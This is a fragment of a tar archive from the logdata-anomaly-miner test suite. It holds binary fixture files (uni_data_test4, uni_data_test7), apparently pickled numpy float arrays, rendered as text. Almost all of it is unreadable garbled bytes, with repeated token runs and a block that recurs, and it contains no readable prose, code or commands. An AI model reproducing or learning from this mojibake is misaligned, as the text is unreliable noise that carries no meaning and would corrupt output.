G?jӍ{*G?4G!G?]G?kG7$HG?;G?VGײa+G?2ge(G?^$G?lIJGJXG5wG?R\ GG;TN@G,0G) ,G?ߌc<:TGA!G?.#GoAǂ 8G?)kG?ͬ[yG?vָ(G?uG? ӇEG?3GT3 G?Hn}G1GG,OGyZlG?_M?G?X6A6VG?(\cKG @GG? 
G?0®GG?ܒ#:0GN@G?~S~G?S&A8G?ҫgGM]G?ff <_LG?"+vHG1c@G?-4G8`G?!"aGvϤdG? 3 G??DG? GyȾ#GY @GɒGRȨ8G?@[EG?|9G?ςqa`G?`G?狅PG?#GgG?F"`G?O٠%G>VGc- G?V`G?@ G?@*.&Gv/`Gk3G%Gb +{5GkjsbG?ыG?)xTG{kG?G5nGyMG%-G?젽PG?j+G?㏄ dD0G\5Gfu >G姖閠G?MH=G҆CP˔G?3%ݘG?u.NtG?iXG? l, tG?/5HG3w G"<G$w}GOIGvBD@G??"*G؀,GУ=+ xG?m:IG?~0G8@G?OhGcpG2G?a^UG޺GQ8vGOCG?l@=TG?{G?=H*G?J)6LG՘3hGi@G?d8o`Gd"Խ`G?hG?1O4G|3YG?QG?ʽlxG?΢KHGJ4ѠGȈ*GpG?VA#G.DG G?ke`,G?LG?sE~G% G?H/G?lG?( >:G?/%tG&G?sG?m|E G?伳/G?〲XG?ԕw\G?ݏl$xlG%JG* CjG? :J@GNG?g&5GZ-@G]G،zƄG?YK>G?♓G?OXkGJGX%G?ZyG?c;_KAG? tGHs2G =G0$ G׸~\!G? R]G-XrRG޷9A@G?ŸKLGrG'cG?a4/lG?hOxHG?_<8G?ٔ~'GLXG?FF G? Nc"Gɢ>|@GF nG?Н0Tz%GpfdG?s" G?) z^G?)bG?K8G?OFG?Y[%a4GXlG[rn G=|G? ` G?ã9nGj! G%BȐGN7G?9+0G?[(G? `GxG?ꍘd*G?v pG?–8G?yF`fG?LdG?wG?ԠyDG?\-ͰG;G?ŠzĠGLG?Am&0G?&jG{GN#v0G?E>`RG?i(G? G7Gj[G?ZLGn~eBGXFG5n7gG?^wtG?kYG?f`,G?s-GG?^G?[m ;GIrC?G?"G*BbG58bˈG|ڴXGL> `GH_Gp*ҜG꿞lG?ЯG?|G?l rG?1G̞0G?IGT FG%t" iG?4XG?8B/5FG:/؊|G?⁆gG?WlrG? G?e:G֥4Gq,G?AzG?ƬiWXG)+GU.GdG3G?̔^Y,G?ʂy1G?܇~G?o'Gj:X8G?JG4Gou@G? ^G?ԽGڛ ڄ!$GYd}G?I{|G?h(4G? 2G0BG?ف/\@G5G= GG?EG?[dG?Q<#Gg @NG--G?ߨ,G9)b`G?OYG稀2GӘuG? ֩EG?7G?×^<*G?CLsvG>SG׳ Gxn8%G?|GVuGتiG?#"pGk6bG#割`G+ʼG?z2(G7JVOGN;a*G / G?Ha-G?GV!BeG?'~@G?DGUxdkG?(=pNG?3"+GlG?܆,"G?NG?V:G?M64|GM6.G?v ^GJGctGs4G則%G+(S|eTG?[9G?u`G+G?b+VPG?GEGk;0G?T"G?3A5%0G?1\G?NaRG?u1OG?覮ƯGJ\8PGl pG?ª G?-qG?UBNG?V>\G?ݷɦG EȭG&GeeQ G3``GI!lG?&-\G?&G32G@PGb5G(f"G?s".G?ߍ-~PG?k^}rG?pe`G?5RhOG)RGG'暡G^GGŠG?ǠGg!`>G?%WFG?=G?ӻ juG?{hźG?B5GAGΙcpG?èG?5MGvzGAGߥ0G6kGR6G?սŅDG?5S Gْ[WG?lًG=24LGO_|`G?)YxG{sG?6˾G?຋7G?K*GSi/ `G?9NGŸXGGGrhG?vGG?m-G?QhG,DG yWdG?rGئGRyGTB>G?yG?VG?K4nG?r.YEKG?G<G?⌉uG3s xG?xgȐG?r0G?G?ADR:GhJFG?aHvG?!)wG?ĶMTf8Gop$`G? 6v~G?Ҧ'G#xN(GࠝY G?+`|G?) BGxw[G?SeCG?=UvGr(eG;4xG? BNPG 5ŨGd7 PGwKXG?ȀVEGA$5АG?|VoJGǩjGTJN\G?G&zGX|ŸG?SMDG?7V{ DGZtG?nA5 GN G?c*%G?#݀G?GDgÖG?ɢa`G?_1G?KG5T5G?y@GxCJ5^G?W~HG?>Gƕ9lMhG8GߩN5)G@G v"G?jkϧxGb=Gɖ:7 GtPG?ꤛG?-TG[LGDG~cSnG?AxWlGຩG?ۙ;'G遵mVG?wkNPG?0c'@G?G礶ʀGŗl3G5^2G/&GLMG?[4G ;`Gp$ru#G?#G8G? 
Q GyYz7G$⻬G?F=,8GdG?*G?AG?xuG?ٌkxG}G猔z[G?S,vGԂG?}TzG?&rBG?*()xG?;G?,;G˭T@G?DG?Cxu@G|"#(Gy0Gj-"G?wO}GnG֫5Z@GΉXUPG?Y#GGWyG綒#G?(ЅUjG?B%A{eLGaNPM4G? dP*G?QAf2G?7=ZeG??_Gź}UpG܍>GsG?Sk:G?5DvØG?w͛,G?P[GtG#^G?[cGP &)GTtG?+GǢG?rgXGu3G?삗5PG?:$FpGMƆĵvG?~)LGޠG?A(~G?mP0G|`G(`GUX9G?PTp$G!{G?pG?_աG?⣘坈G?hG?Qf`*G?౟2G?WyGRu,G?tG?8wG➰4Gեh]\G?ɶ|Z{@GG?-5WG?5:WGX@Gݜ)GV(b٤G?i^%|@G?Ъ$iG?b*vOqDGLG?%sG?a=G~^/GJ|FlG?֎65G? ckzG?剛RG?qRQGR GLGVouNzGfGTG?!eLG?GAGFG?? )G?phG?RG#0Gw|VGQVG?ד"AG? pGفTe](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/uni_data_test4000066400000000000000000000232541500476301700273170ustar00rootroot00000000000000&](JjYJsJ( JJJ8JJJw J{J׃J6JJJcJ+ Jt JJ? JEJVJǹJ@JJ\ JJ:MJpJxJ J JJ"JJܮJ:Jw]J;J-[JPJG+J J4JJ J6J%|J J JKJ`|JwJˎJ%iJJJ@ JeJXJ JJ~ JhJJkJNJ JJJ$~JHJ3XJg| JJu7J JXJ2J JJJJJ'J JVJuM,JE7JbJ9J%J\JQ{JJJN~ JLJJJJYJպJ!JgJs#J1JJ1uJk_JIJJ~JmJgmJJTJ7JJ$J]M&Ja JzJJ J5aJJFJJoJJXJ J3 JJEJE)JJ& J J)JJJJqJKJJJJƟJJJLJ9JSJJ- JcJJJ J(#J J4JrJMjJS| JbJq J/J[0JJ JJgJJJ4JJJJ( J_JmQ JJJ\JJgJJJ"JϧJ\JAJqMGJ M JJaJQJ=JkSJJ|JJ&J MiJJv J1>JJeJХ JJRJMd)J]RJp Jq(J{jJS\J(aJm&J JJJ7JtJJJeJ#Jr JJJW J JwzJuRJIJPSJJ:JJB JJJJJ JJSJ( J-5JJcJJ}J҄JJ-JJJMJ+J\JJbJJ3AJJJJJzqJJ_JuJ26JJJ6 J$J# J JPJg JR&JdJJ]JJ'J bJFJjVJ>JpJ JCJAJJJPO JJy J:IJ\ JUp Jb JJw JfJJJ JJJJ/J JiJeJwJLJ JkJJ J JJ J+J JJJ JSJ Jb?JsJ3iJJyv J_J=JfJ{ J=J JbJ"JJوJM]J~JdJxJ HJJ9J%: JH JJJ/tJCJJJB JVJzJJcJ JJ.-JJu JdJ?JwJJ* JS JgJ9JJkJKJ JJ|<J^ J'J?JTWJ5JJ"J7JƋJJsJ' JJJ,JyJږJ9JP JJtJ)J_sJi JMbJTJNJ8JX JBOJ J JpJ oJJJ/J5JMmJJĹJ"J7JG Jp JFJɏJ JJA&JxJ JJJJۤJ8J J'kJ1JMJJJ=5JJ=eJh|JJuMKJ22M_JJ:wJZJ J̙Jq J"CJJ)- Jn Jn JJ,J" JجJKJ J:JJ)JIJiYJ[J6 JJ#T JJ J J<JJJGJJq J;VJmJ7 J`JfJ^J J*JJ J JSJJJ J JKJJlJJ: J JbJJJ; Jy JJ Jlw J4JwJZvJJ;J1J? JRJSJHJ J pJ JuJ\ JNJ`J2JJJJ}J\MFOM]J2JJlJEJ? 
JNJnJsJJJJv;JJXJQ Jd J J*6J]JJJ{JeJáJ> JCJعJbJ;JLJFJ Jn&JJEJPIJJͶJJ@ J>J2| JsJFJFJ!)J JJJ' JJ1J4JtJJMrJJZJ\MJ1gJiJ\JJ7JTJJy JδJlJ^ JRJJ(JhJ41JIJuJwb J)*J J5J J= JJgJ_JJJ}J > JJJNJ*JJJG JNJh J]]JJZJpJJWJJAJ J Jf JJocJI~JKJ=JοJB4J J JN JT:JwJU7J$JUUU6G(rXG+ީG?9T\G#EG?ޚzG4ĶF0G?/dG?H8G㢖68G?zR~~G(5sG?$G?IjKGܳG?HG?D%gGhuG?1ОG?D1MtG*cuG4lG?LtG?˭qKG?,Q ,Gīˢ:Gmb/G?6UNG?[`gGG?#cGę+0G @G?uG}!DG?UG?b;%\GJ{G?$zOG? ŞTG?snGc()G?Բ\G?oUү GoYGG?]VG?'Ew2G? `.IQTG?^f$GNG| dG?Ģk ҙG?s8\mG?cuX2\G?@G?ӗGɈwGGӽ3t#XG?5R"G?#FG?Q gOPGKG S0G?ĺG?GZ8G? =VG?w_rG?NXĄGҦ&͂Gv]EGoW@,G?U6gdNGݓ|f~GjbzGSLl GՅ/+cG} EΨG?`&]:G?߄HGAu?zG?i# (G?,I*G?lA@G?NG?ɥw}KGftG?Į:GLrPG?g}ҲGDG?ғьG?X(z6Gֺ{GG?ux`JGԁ\G뮢a(G?ڑG}G?(>#)G*ѳTG?}gPG?_DG?3]wG?sFG?ώwT(GcU@Gd20XG?Gt-zGL*m{G?\\6CZG?xxfG?0( GJ@(G?ḿ( mlG`lG&Ç5̺G EGS;0GxQG?)_W6GɈ\PGdt=GRTG?RG,~G?>#x3bG?vG?Ꭲ&GEt[ GĐ(G?\ G_ G?3yG= @G?;:G?zV*6G?̤A4P|G6G?[G!dGK53iGσ;G?FDG?$&CŔGBli?rGrW$G?кjM{G?'C/\G+0.7.Gp[7G ŔAG?\IjG?ÞLG?ТGHDG? rpTGPB`GMGo+XG?ЁG?}PGª2hG?;yPG7cG?M4 ;`G=]fsv(G@֩G 0G?M}͵G?ϧ[G#0+GO'3G?_VG?)dG?件gG?uG?0I(G?g(GsdGڊG?җ[VG? 8DTG6[u atG?rhG|dTGݧقG?(4G?&1 G?H_RG?Y G?$GG?[8>.G~8G @QyG@vG?XIVG?GI4ԤG?3U4G?jInG^'GNMGTG?rtGŀYB8G֤dopG?ledG?ߩtG?FNqG?Џ@!G?\ 9 Gpk.G~mfMG?1&%GnvG?0G?tКGl?as@G0fG?#OxGB X`G?sųG?KzXG?U[G]ƁG֒&<GsG[9oGʈG/\GgRhG viG?Ff@G?VG?hMˆ5G֔gTG?]^PG٦zGԂE8GncGG" G[GuW6.G?&t{RG??NNG?UpG?-PG?a gwGֻJ\G&gG?TrG6)JGcIG? G?eGwF`G?!wގG?=G?D1V:G#1: GijRLG?ՙhwG?vG2K%sG?"xG;9;G?V0GԺ|G֠$ G?15hG?M/S_GЛ(UG?#G8,TUG,0G?S`G#[$G?:dG?߉HKGVGWCwGѵq0G? ]hG!DLPG?͊ G?Ҕq$G?9DG?:Rh6Gzl%G?kFTG?ﳞG?YӀA8G?ED G?_uIDG?Щ>GylG? 1 G?3lG?8 @UG?u8G?(G?HMG? |xG? ]&kG6@G?KꂭG ɔ G?꽱))aGž;G.EG|uuNG?sQ;tG?h=kHGȿG?>5XG? vʀDGUnG?ڌE*GT7PG˲ϞGٹa`xG dRG;@odG'3G veTG?m*NGnG?UXG?ொG?߶{\G!KdG?&~G%G?(|$rG?eOn(TG?IuG?^GؕEuGռQ G?MJG?`\lXG?zHGĎKG?&)ǮGJk G?qlHGض.#DGc@tGsVKhG5tG}vG?i G?0G?[*G?{%XcG?.G?2 !G_lG?wb VGueG?tʔGፗ:G?&G?г̒1\G :ʁGQ `G?֯UU$Gҗ()Gޜ*G?zG?re>@G_RG?@GxkG?mj1nG*G`ў$G^G?vKGQw?Gy)G?V@G ?jG? U.HG&GH4ěVG?- G|Gxe G?f2G,vG6GSaiG? 
|G?+(GAnpG?cǝGHGdԸG?T]GdG.I1GXGS/PG?XG.DGZWĠG:lG.G?d;nGMB_rG?{-YGX|g.YG?y˜G~b GW!dXG?qq%G?eeJvG7? :G G@G?ҡ GfG?(7sGN G?jӍ{*G?4G!G?]G?kG7$HG?;G?VGײa+G?2ge(G?^$G?lIJGJXG5wG?R\ GG;TN@G,0G) ,G?ߌc<:TGA!G?.#GoAǂ 8G?)kG?ͬ[yG?vָ(G?uG? ӇEG?3GT3 G?Hn}G1GG,OGyZlG?_M?G?X6A6VG?(\cKG @GG? G?0®GG?ܒ#:0GN@G?~S~G?S&A8G?ҫgGM]G?ff <_LG?"+vHG1c@G?-4G8`G?!"aGvϤdG? 3 G??DG? GyȾ#GY @GɒGRȨ8G?@[EG?|9G?ςqa`G?`G?狅PG?#GgG?F"`G?O٠%G>VGc- G?V`G?@ G?@*.&Gv/`Gk3G%Gb +{5GkjsbG?ыG?)xTG{kG?G5nGyMG%-G?젽PG?j+G?㏄ dD0G\5Gfu >G姖閠G?MH=G҆CP˔G?3%ݘG?u.NtG?iXG? l, tG?/5HG3w G"<G$w}GOIGvBD@G??"*G؀,GУ=+ xG?m:IG?~0G8@G?OhGcpG2G?a^UG޺GQ8vGOCG?l@=TG?{G?=H*G?J)6LG՘3hGi@G?d8o`Gd"Խ`G?hG?1O4G|3YG?QG?ʽlxG?΢KHGJ4ѠGȈ*GpG?VA#G.DG G?ke`,G?LG?sE~G% G?H/G?lG?( >:G?/%tG&G?sG?m|E G?伳/G?〲XG?ԕw\G?ݏl$xlG%JG* CjG? :J@GNG?g&5GZ-@G]G،zƄG?YK>G?♓G?OXkGJGX%G?ZyG?c;_KAG? tGHs2G =G0$ G׸~\!G? R]G-XrRG޷9A@G?ŸKLGrG'cG?a4/lG?hOxHG?_<8G?ٔ~'GLXG?FF G? Nc"Gɢ>|@GF nG?Н0Tz%GpfdG?s" G?) z^G?)bG?K8G?OFG?Y[%a4GXlG[rn G=|G? ` G?ã9nGj! G%BȐGN7G?9+0G?[(G? `GxG?ꍘd*G?v pG?–8G?yF`fG?LdG?wG?ԠyDG?\-ͰG;G?ŠzĠGLG?Am&0G?&jG{GN#v0G?E>`RG?i(G? G7Gj[G?ZLGn~eBGXFG5n7gG?^wtG?kYG?f`,G?s-GG?^G?[m ;GIrC?G?"G*BbG58bˈG|ڴXGL> `GH_Gp*ҜG꿞lG?ЯG?|G?l rG?1G̞0G?IGT FG%t" iG?4XG?8B/5FG:/؊|G?⁆gG?WlrG? G?e:G֥4Gq,G?AzG?ƬiWXG)+GU.GdG3G?̔^Y,G?ʂy1G?܇~G?o'Gj:X8G?JG4Gou@G? ^G?ԽGڛ ڄ!$GYd}G?I{|G?h(4G? 2G0BG?ف/\@G5G= GG?EG?[dG?Q<#Gg @NG--G?ߨ,G9)b`G?OYG稀2GӘuG? ֩EG?7G?×^<*G?CLsvG>SG׳ Gxn8%G?|GVuGتiG?#"pGk6bG#割`G+ʼG?z2(G7JVOGN;a*G / G?Ha-G?GV!BeG?'~@G?DGUxdkG?(=pNG?3"+GlG?܆,"G?NG?V:G?M64|GM6.G?v ^GJGctGs4G則%G+(S|eTG?[9G?u`G+G?b+VPG?GEGk;0G?T"G?3A5%0G?1\G?NaRG?u1OG?覮ƯGJ\8PGl pG?ª G?-qG?UBNG?V>\G?ݷɦG EȭG&GeeQ G3``GI!lG?&-\G?&G32G@PGb5G(f"G?s".G?ߍ-~PG?k^}rG?pe`G?5RhOG)RGG'暡G^GGŠG?ǠGg!`>G?%WFG?=G?ӻ juG?{hźG?B5GAGΙcpG?èG?5MGvzGAGߥ0G6kGR6G?սŅDG?5S Gْ[WG?lًG=24LGO_|`G?)YxG{sG?6˾G?຋7G?K*GSi/ `G?9NGŸXGGGrhG?vGG?m-G?QhG,DG yWdG?rGئGRyGTB>G?yG?VG?K4nG?r.YEKG?G<G?⌉uG3s xG?xgȐG?r0G?G?ADR:GhJFG?aHvG?!)wG?ĶMTf8Gop$`G? 6v~G?Ҧ'G#xN(GࠝY G?+`|G?) BGxw[G?SeCG?=UvGr(eG;4xG? 
BNPG 5ŨGd7 PGwKXG?ȀVEGA$5АG?|VoJGǩjGTJN\G?G&zGX|ŸG?SMDG?7V{ DGZtG?nA5 GN G?c*%G?#݀G?GDgÖG?ɢa`G?_1G?KG5T5G?y@GxCJ5^G?W~HG?>Gƕ9lMhG8GߩN5)G@G v"G?jkϧxGb=Gɖ:7 GtPG?ꤛG?-TG[LGDG~cSnG?AxWlGຩG?ۙ;'G遵mVG?wkNPG?0c'@G?G礶ʀGŗl3G5^2G/&GLMG?[4G ;`Gp$ru#G?#G8G? Q GyYz7G$⻬G?F=,8GdG?*G?AG?xuG?ٌkxG}G猔z[G?S,vGԂG?}TzG?&rBG?*()xG?;G?,;G˭T@G?DG?Cxu@G|"#(Gy0Gj-"G?wO}GnG֫5Z@GΉXUPG?Y#GGWyG綒#G?(ЅUjG?B%A{eLGaNPM4G? dP*G?QAf2G?7=ZeG??_Gź}UpG܍>GsG?Sk:G?5DvØG?w͛,G?P[GtG#^G?[cGP &)GTtG?+GǢG?rgXGu3G?삗5PG?:$FpGMƆĵvG?~)LGޠG?A(~G?mP0G|`G(`GUX9G?PTp$G!{G?pG?_աG?⣘坈G?hG?Qf`*G?౟2G?WyGRu,G?tG?8wG➰4Gեh]\G?ɶ|Z{@GG?-5WG?5:WGX@Gݜ)GV(b٤G?i^%|@G?Ъ$iG?b*vOqDGLG?%sG?a=G~^/GJ|FlG?֎65G? ckzG?剛RG?qRQGR GLGVouNzGfGTG?!eLG?GAGFG?? )G?phG?RG#0Gw|VGQVG?ד"AG? pGفTe.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/uni_data_test7000066400000000000000000001575111500476301700273260ustar00rootroot00000000000000>](](numpy.core.multiarrayscalarnumpydtypef8KKR(KRhh C| ᅯRhh CU.h?Rhh Cz)!?Rhh Ct??}?Rhh C(~@On߿Rhh C0vRhh C ?Rhh C=?Rhh CPwFϿRhh CXlr$ϿRhh C`"`ImRhh CO㿔Rhh Cuu翔Rhh CP޿Rhh C`~5%?Rhh CPȿRhh CܕRhh ClKK⿔Rhh CVkhp8?Rhh CI>?Rhh CJ?Rhh Ch翔Rhh COT:?Rhh CT7=9ٿRhh C@F?Rhh C(?Rhh C?Rhh Cr16m?Rhh CO޿Rhh C,{'?Rhh CzDBW?Rhh CߙK鿔Rhh CIS忔Rhh C6'ES=翔Rhh Ca=?Rhh C6 WᅯRhh C6Q艻?Rhh C$a"R[濔Rhh ChWW?Rhh CbORhh CM-̿Rhh C\l'y?Rhh C +tuRhh C|t/տRhh C$B/t?Rhh C0[v>ϿRhh Ca-޿Rhh C}{W?Rhh C\%eGԿRhh Cr:<6܈?Rhh C鿔Rhh C?Rhh C DlۿRhh Cs/l?Rhh C@ ǿƿRhh CvǚIc?Rhh Ch 濔Rhh Czz῔Rhh CKLhoԿRhh C2 mRhh Ch P _ԿRhh Cj3R1?Rhh CbJ+GӿRhh C8SܿRhh C>9V῔Rhh C,7"ݿRhh CnGݿRhh C*返Rhh C.-FbhRhh CRN㿔Rhh CNꮯ3?Rhh CN뿔Rhh CDs&)l?Rhh CpnKѿRhh CN~J;濔Rhh C`:Xi颿Rhh C@ܿRhh C_w\?Rhh Cو.?Rhh C3 ?Rhh C^Us1뿔Rhh C O){jRhh C$+7 `?Rhh CL?Rhh C'㿔Rhh Cn?Rhh Cn?Rhh C0*_꿔Rhh C¢ ?Rhh C꿔Rhh C|7]ӿRhh CX1CܿRhh Cۉ?Rhh C:.?Rhh C軨U?Rhh CIO?Rhh C8ÿRhh C>k?Rhh C^W5e返Rhh C`J?-?Rhh C֖K῔Rhh C(w5b?Rhh ChS?Rhh C`"gտRhh C<_濔Rhh C k @a返Rhh C4῔Rhh CZ:ҿRhh CN9Y?Rhh C\D?Rhh C&Rhh CgѷY?Rhh C %?Rhh CP8?Rhh CzŤ<ᅯRhh Cz ?Rhh C!P_?Rhh CVQ?Rhh Cf?Rhh CʎǭJ?Rhh CB]Rhh C0DѿRhh Chx+?Rhh CL?Rhh C?Rhh C 
C_SǿRhh Ch Z ?Rhh C ?Rhh Cr;Rhh C8ܿRhh C,t.?Rhh Cl'ۿRhh Cz?Rhh C([>Rhh CyG9?Rhh C??Rhh C`Rhh CXH?Rhh C 0k?Rhh C < {?Rhh Cq]~QRhh CӪ7?Rhh Cc~῔Rhh C"R?Rhh Cu87~鿔Rhh Cy%Rhh C̗g/Rhh CxݿRhh C?ӿRhh CYbj῔Rhh Cܴ?Rhh Cn7?Rhh CHwh?Rhh C)OܿRhh CvM,?Rhh C~ 5㿔Rhh CD ~ܿRhh C sBn?Rhh Cik⿔Rhh C( 4GܿRhh CY3ᅯRhh C( gVؿRhh C0q~o?Rhh CW}?Rhh C0zۦRhh C$H쿔Rhh CItֿRhh C$rؑ?Rhh C W亘ǿRhh C|?Rhh Ci ?Rhh C'K?Rhh C7E?Rhh CL^M$?Rhh C߅0?Rhh C῔Rhh C76p?Rhh CcMRhh Cˆ?Rhh Cx]??Rhh CжWಿRhh C|2s ?Rhh C,k.翔Rhh C0`dcпRhh CD[?Rhh CxځaĿRhh CY 俔Rhh CLZL4oRhh Cr*K?Rhh Chw?Rhh C 7鶼Rhh Cx~_6?Rhh CSxRhh C>R@?Rhh C5PcRhh Co|Iy??Rhh C`Q+u*ſRhh C&ʿRhh C>4J࿔Rhh C(c]?Rhh C&5¿Rhh C ſRhh C}¿Rhh Cߎ1e?Rhh CH?Rhh C`NRhh Cy]?Rhh CC?Rhh C$`(࿔Rhh CRTpJ?Rhh C/X"ٿRhh CWhw)k返Rhh CX|K?Rhh Cp<ӎ?Rhh C̦݇Rhh C3}?Rhh CbO俔Rhh C:{?Rhh C/ҿRhh Cxr~濔Rhh CPs6ۿRhh CB?Rhh CK>꿔Rhh C,m?Rhh C0HK2?Rhh C潓}?Rhh CSS"8=?Rhh C/AY?Rhh CPX%?Rhh CJ88⿔Rhh C`_դ߿Rhh C-I?Rhh C0K?Rhh C8z+鿔Rhh C7tij࿔Rhh C B"mᅯRhh C_rI返Rhh C(V ?Rhh CT9ݿRhh Cb?Rhh C)ꙫ4⿔Rhh C{_ ?Rhh CD]=?Rhh C,͡eRhh CH"Y4?Rhh C(Zn?Rhh C`?Rhh C<@?Rhh C&gRhh CE|?Rhh C ?Rhh CP~>9ܿRhh Cp=v῔Rhh CLRm俔Rhh CRٖɢRhh C` ?Rhh C`)8ȿRhh C`zٿRhh C-a鿔Rhh CKᅯRhh C0V?Rhh Cd9[㿔Rhh C9wc?Rhh Cf[/返Rhh C>lοRhh Cy?Rhh C` h?Rhh C)t܆Rhh C~?Rhh Ct>?Rhh CT<пRhh CJd@c쿔Rhh C1ɥ?Rhh CD?M濔Rhh C0k"?Rhh CzE?Rhh C^=?Rhh C*ܿRhh C~j:/[?Rhh CɘRhh C|*返Rhh C~V?Rhh C5bgοRhh C;\-翔Rhh C3Ę'?Rhh C:O返Rhh Cjwր+鿔Rhh C쨟ٿRhh C ¯0'?Rhh CTɿRhh C뇆u?Rhh CZ|_俔Rhh C@դտRhh CH鿔Rhh C:ֿRhh Cs ?Rhh C(sϿRhh Cl|aYܿRhh C 忔Rhh C=ƶ忔Rhh C‘?Rhh C+6:ǿRhh Ch俔Rhh C4F?Rhh CPxu|[?Rhh CD+W?Rhh Cf]m*?Rhh Cv?Rhh C A?Rhh ClxV޿Rhh CV7Rhh CY俔Rhh C~V ?Rhh Cв7ſRhh C4eRhh Cv8?Rhh C`ٺ?Rhh CXB3翔Rhh C5T 'Rhh CVP;qRhh C>\1ϿRhh C䇝8?Rhh C: [a?Rhh C5|$쿔Rhh C՟?Rhh C 3|)Rhh C?Rhh CC ZdsᅯRhh CL]^Rhh C􄶯ҿRhh CQCҿRhh Ce?ۿRhh C@EwDۿRhh C<=?Rhh Cb%xY濔Rhh Cҋ?Rhh C|{R?Rhh C?Rhh C-Y俔Rhh CPgŅV{?Rhh C:g|῔Rhh C^s?Rhh CO?Rhh C,^H|?Rhh Ch_bJ?Rhh C_࿔Rhh C0!=ƿRhh CH?Rhh C1Rhh Ce?Rhh C1Y??Rhh C@ B?Rhh CsS?Rhh C; ʿRhh CKC?Rhh CzD;Z࿔Rhh CD?Rhh CaIfS?Rhh CYPᅯRhh CWWȿRhh C*9?Rhh CbW?Rhh CrQ?Rhh 
C㿔Rhh C\Q?Rhh C?Rhh CpH?Rhh Cn[ؿRhh C@3藶?Rhh CL0b&?Rhh CXK)?Rhh C(N\?Rhh C_㿔Rhh CT ӿRhh Cok?Rhh C?Rhh C0Yڡ>v?Rhh C4ԿRhh Cjm?Rhh C׿Rhh C[Rhh CT?Rhh C=?Rhh C??Rhh C@r?Rhh CdXs?Rhh C;ֿRhh C Vv鿔Rhh ClcS_?Rhh C4*?Rhh CPNRhh C$?Rhh ChZؿRhh CP_С˼?Rhh C (返Rhh Cd`*տRhh Cc?Rhh CX?Rhh ClڿRhh Cp|UiȿRhh CeݿRhh CнZ?Rhh Cذ~N:^?Rhh C(?Rhh Ch꿔Rhh Chn2?Rhh C̸95?Rhh Cm"D?Rhh CkfH?Rhh CнG?Rhh CRD/X?Rhh C_R?Rhh C\ng?Rhh CH?Rhh Cbb~a῔Rhh C&I)?Rhh CvAnG9뿔Rhh C)N=v+?Rhh C )sS翔Rhh C}Yw忔Rhh CTRhh Cs$ܼRhh C}'o?Rhh CO ?Rhh C:U?Rhh C\'A?Rhh CU:"?Rhh CHY̿Rhh CV5俔Rhh Cj{߿Rhh CB&(˂翔Rhh CV~cRhh C? ?Rhh C`翔Rhh C9K˿Rhh CM؃?Rhh CT?Rhh CX B\⿔Rhh Cxi返Rhh C*Gk:῔Rhh C$wы~Rhh CRIQnÿRhh CvЭ?Rhh C0wI?Rhh Cs?Rhh Cr-6Z8?Rhh C<)?Rhh Co\ؿRhh CDU{濔Rhh C](OҿRhh C'X6?Rhh C1JRhh Cr//9i쿔Rhh C4I2&?Rhh C\׿Rhh C@EL[?Rhh C@0=@?Rhh Ct{ԺU?Rhh CHQ?Rhh C1XX俔Rhh Ci2zK?Rhh CX6ƿRhh CP=_P ?Rhh CO`ez俔Rhh CFr?Rhh CxԿRhh C d&?Rhh C濔Rhh CUZ忔Rhh CWt?Rhh C21>忔Rhh C0!)3濔Rhh CFy|俔Rhh C2s?Rhh CQg?Rhh CO^俔Rhh Cp⚏ʿRhh C&p*7?Rhh CJail?Rhh CL&g?Rhh C_Rhh CvZ?Rhh CF+#Rhh CڈؿRhh CuᅯRhh C&u7?Rhh C῔Rhh C`N ?Rhh CX?Rhh C| 濔Rhh C,}ݿRhh C$.`ֿRhh Ch޻?Rhh C ;ᅯRhh Cp@1n?Rhh C5o῔Rhh Ci-yƿRhh C@$ S̿Rhh CƷ5L?Rhh C.T?Rhh C?7ſRhh C5?Rhh CM Rhh C:fn࿔Rhh CP?Rhh CNT.?Rhh C|q6翔Rhh C?Rhh CH˿Rhh Cx([ѿRhh CI鿔Rhh CK?Rhh CK*NRhh C$Q<쿔Rhh C:FM?Rhh Co?Rhh CнH?Rhh C0N5鿔Rhh CpnCؿRhh Clxwq5?Rhh Cx@B?Rhh Cua{fRhh C8ۿRhh C E?Rhh CH*пRhh Cq(Rhh Cm!Rhh CTޝ?Rhh CxߴN?Rhh C3>K:ܿRhh CL}Z쿔Rhh CD;tS?Rhh C |ٿRhh Cěܠ?Rhh CAk?Rhh C}?Rhh C:ͱ,Rhh CsʁRhh C X.]̿Rhh C׿Rhh C 9?Rhh C8 i ARhh C8S)Kg?Rhh CDt2忔Rhh C|#dᅯRhh CY_q<0?Rhh CAҞ?Rhh C.!I쿔Rhh C cJj?Rhh CH?Rhh CHܿRhh Ct*YeܿRhh C8[E?Rhh C5K?Rhh Ct"̿Rhh CbH]?Rhh Cp,KX?Rhh C3Zb鿔Rhh C=&?Rhh C6(?Rhh Cgl쿔Rhh CB1?Rhh Cſ?Rhh CW%>?Rhh C 鶫Rhh CR-Rhh CB?Rhh C֙A?Rhh Cp$셹?Rhh C$h7ֿRhh CU{?Rhh C7?Rhh C OοRhh CN)@?Rhh Co࿔Rhh C@i7Z?Rhh Cv?Rhh Cd?Rhh C(,?Rhh C;?Rhh C^d0忔Rhh C2LA?Rhh C`@"?Rhh C8`i?Rhh C"?Rhh C4L쿔Rhh CHvX4㿔Rhh Cr$vC t?Rhh Cj n??Rhh CIe㿔Rhh Cmg?Rhh Cꗃ࿔Rhh C~=?Rhh C`Ǝ޿Rhh Cvc?Rhh CPxQ?Rhh Cf?Rhh CL{ ?Rhh C;t쿔Rhh C0?ey?Rhh C>Ǐ?Rhh 
Cpz٬Rhh C@sio6Rhh CД Ҩ쿔Rhh Cl/.῔Rhh Ct+PӿRhh CX] ?Rhh CS?Rhh CZ?Rhh C!!返Rhh CxHԿRhh C|ҽ࿔Rhh C@-B?Rhh CP u?Rhh C W⿔Rhh CE(H忔Rhh Cy̥?Rhh C:\?Rhh C$ q[返Rhh C?Rhh CZ㞲?Rhh CGZC꿔Rhh Cͺ?Rhh C <SRhh CT#?Rhh C>?Rhh CF*D?Rhh C~ES¿Rhh CM*࿔Rhh CG}qk翔Rhh CFfYƅ9뿔Rhh CGI#?Rhh C[Rhh CBφ ?Rhh CΐM¯쿔Rhh Cؙ9ҿRhh C&W-㿔Rhh CPxF?Rhh CRip?Rhh C`Ndv?Rhh C@rȺ?Rhh C@.!?Rhh Cs1=?Rhh C!KK?Rhh CjY)6?Rhh C j?Rhh C u(ùտRhh Cb7뿔Rhh CO((俔Rhh Cu9?Rhh CxRhh C14Rhh CAHl?Rhh ChaG?Rhh Cv+ɭ/?翔Rhh C 